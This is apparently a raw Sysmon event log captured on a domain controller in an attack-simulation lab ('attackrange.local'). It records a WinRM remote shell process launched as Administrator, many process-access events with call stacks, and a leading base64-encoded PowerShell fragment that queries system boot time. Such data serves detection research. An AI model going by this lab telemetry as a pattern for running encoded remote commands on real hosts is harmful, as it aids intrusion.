KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3E2E-5F80-13B3-040000000000}0x4b3130HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.750{733EE690-3DF9-5F80-1500-000000007F01}13561984C:\Windows\system32\svchost.exe{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.734{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.734{733EE690-3E2E-5F80-7700-000000007F01}45764596C:\Windows\system32\conhost.exe{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E2E-5F80-7700-000000007F01}4576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.724{733EE690-3E2E-5F80-7600-000000007F01}4564C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3E2E-5F80-13B3-040000000000}0x4b3130HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3DF9-5F80-0C00-000000007F01}588C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:46.718{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.264{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:47.264{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 